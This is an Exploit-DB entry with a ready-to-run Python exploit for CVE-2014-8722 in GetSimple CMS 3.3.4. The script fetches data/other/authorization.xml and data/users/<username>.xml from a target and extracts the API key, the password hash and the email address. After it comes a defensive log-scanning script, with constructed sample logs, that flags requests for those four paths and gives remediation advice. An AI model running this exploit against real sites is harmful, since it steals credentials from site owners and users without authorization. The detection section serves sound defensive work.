GetSimple CMS 3.3.4 - Information Disclosure

EDB-ID: 49928
Author: Ron Jost
Type: webapps
Platform: PHP
Date: 2021-06-02


# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure
# Date: 01.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: http://get-simple.info/
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip
# Version: 3.3.4
# CVE: CVE-2014-8722
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit


'''
Description:
GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to
(1) data/users/<username>.xml,
(2) backups/users/<username>.xml.bak,
(3) data/other/authorization.xml, or
(4) data/other/appid.xml.
'''


'''
Import required modules:
'''
import sys
import requests

'''
User-Input:
Usage: python3 exploit.py <target_ip> <target_port> <cmspath>
cmspath is the web path of the CMS root (for example /getsimple or an empty string)
'''
if len(sys.argv) != 4:
    print('Usage: python3 ' + sys.argv[0] + ' <target_ip> <target_port> <cmspath>')
    sys.exit(1)
target_ip = sys.argv[1]
target_port = sys.argv[2]
cmspath = sys.argv[3]
base_url = 'http://' + target_ip + ':' + target_port + cmspath
print('')
username = input("Do you know the username? Y/N: ")
if username == 'Y':
    print('')
    username = True
    username_string = input('Please enter the username: ')
else:
    print('')
    username = False
    print('No problem, you will still get the API key')

# Browser-like headers, reused for every request
header = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Cache-Control": "max-age=0"
}


'''
Get Api-Key:
The key is stored as a CDATA section in data/other/authorization.xml,
so the value sits between '<![CDATA[' and the closing ']]>'.
'''
url = base_url + '/data/other/authorization.xml'
x = requests.get(url, headers=header).text
start = x.find('[') + 7     # first '[' opens '[CDATA[' (7 characters); skip past it
end = x.find(']')           # first ']' closes the CDATA section
api_key = x[start:end]
print('')
print('Informations:')
print('')
print('[*] API Key: ' + api_key)


if username:
    '''
    Get Email and Passwordhash:
    Both are plain elements (<PWD>...</PWD> and <EMAIL>...</EMAIL>) in data/users/<username>.xml.
    '''
    url = base_url + '/data/users/' + username_string + '.xml'
    x = requests.get(url, headers=header).text
    start = x[x.find('PWD>'):]                          # slice from the <PWD> tag onwards
    passwordhash = start[start.find('>') + 1:start.find('<')]   # text between '<PWD>' and '</PWD>'
    print('[*] Hashed Password: ' + passwordhash)

    start = x[x.find('EMAIL>'):]                        # slice from the <EMAIL> tag onwards
    email = start[start.find('>') + 1:start.find('<')]  # text between '<EMAIL>' and '</EMAIL>'
    print('[*] Email: ' + email)
print('')
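From the defender's side, the four file locations named in the description above are exactly the paths that should never be served directly by the web server, so requests for them are worth flagging in access logs, and a 2xx response to one of them means the file was actually handed out. The following is an added detection example and is not part of the original exploit or of GetSimple CMS: it parses Apache combined-log lines (the sample lines, hostnames and CMS path /getsimple are constructed here), matches the request path against the four advisory locations, and reports which requests were blocked (403/404) and which were served.

```python
import re
from typing import Dict, List

# Constructed sample access log (Apache combined format); not from any real server.
SAMPLE_LOG = """\
203.0.113.10 - - [02/Jun/2021:10:00:01 +0000] "GET /getsimple/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [02/Jun/2021:10:00:02 +0000] "GET /getsimple/data/other/authorization.xml HTTP/1.1" 200 238 "-" "Mozilla/5.0"
203.0.113.10 - - [02/Jun/2021:10:00:03 +0000] "GET /getsimple/data/users/admin.xml HTTP/1.1" 200 612 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Jun/2021:10:05:00 +0000] "GET /getsimple/backups/users/admin.xml.bak?x=1 HTTP/1.1" 403 199 "-" "curl/7.68.0"
198.51.100.7 - - [02/Jun/2021:10:05:01 +0000] "GET /getsimple/data/other/appid.xml HTTP/1.1" 404 196 "-" "curl/7.68.0"
192.0.2.5 - - [02/Jun/2021:10:06:00 +0000] "GET /getsimple/theme/default/style.css HTTP/1.1" 200 3010 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# The four locations listed in the advisory (CVE-2014-8722). Matched against the
# path only, so the CMS install path in front of them does not matter.
SENSITIVE_PATHS = [
    re.compile(r'/data/users/[^/]+\.xml$'),
    re.compile(r'/backups/users/[^/]+\.xml\.bak$'),
    re.compile(r'/data/other/authorization\.xml$'),
    re.compile(r'/data/other/appid\.xml$'),
]


def is_sensitive_request(target: str) -> bool:
    """True if the request target (query string ignored) names one of the files."""
    path = target.split('?', 1)[0]
    return any(p.search(path) for p in SENSITIVE_PATHS)


def find_sensitive_requests(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per log line that requested a sensitive file.

    'served' is True when the server answered 2xx, i.e. the disclosure happened;
    a 403/404 means the request was attempted but the file was not exposed.
    """
    findings: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_sensitive_request(m.group('target')):
            continue
        status = m.group('status')
        findings.append({
            'ip': m.group('ip'),
            'timestamp': m.group('ts'),
            'path': m.group('target').split('?', 1)[0],
            'status': status,
            'served': status.startswith('2'),
        })
    return findings


def served_by_ip(findings: List[Dict[str, object]]) -> Dict[str, int]:
    """Count, per client IP, how many sensitive files were actually served."""
    counts: Dict[str, int] = {}
    for f in findings:
        if f['served']:
            counts[str(f['ip'])] = counts.get(str(f['ip']), 0) + 1
    return counts


if __name__ == '__main__':
    hits = find_sensitive_requests(SAMPLE_LOG)
    for h in hits:
        state = 'SERVED' if h['served'] else 'blocked'
        print(f"{h['timestamp']} {h['ip']} {h['path']} -> {h['status']} ({state})")
    print('clients that received sensitive files:', served_by_ip(hits))
```

On the constructed sample this flags four requests and attributes two served files to 203.0.113.10, while the two requests from 198.51.100.7 were blocked. Any 'SERVED' entry for data/other/authorization.xml or a data/users/ file should be treated as a credential exposure (API key, password hash, e-mail) for that install; the fix is to deny web access to the data/ and backups/ directories so that these paths return 403 regardless of who asks.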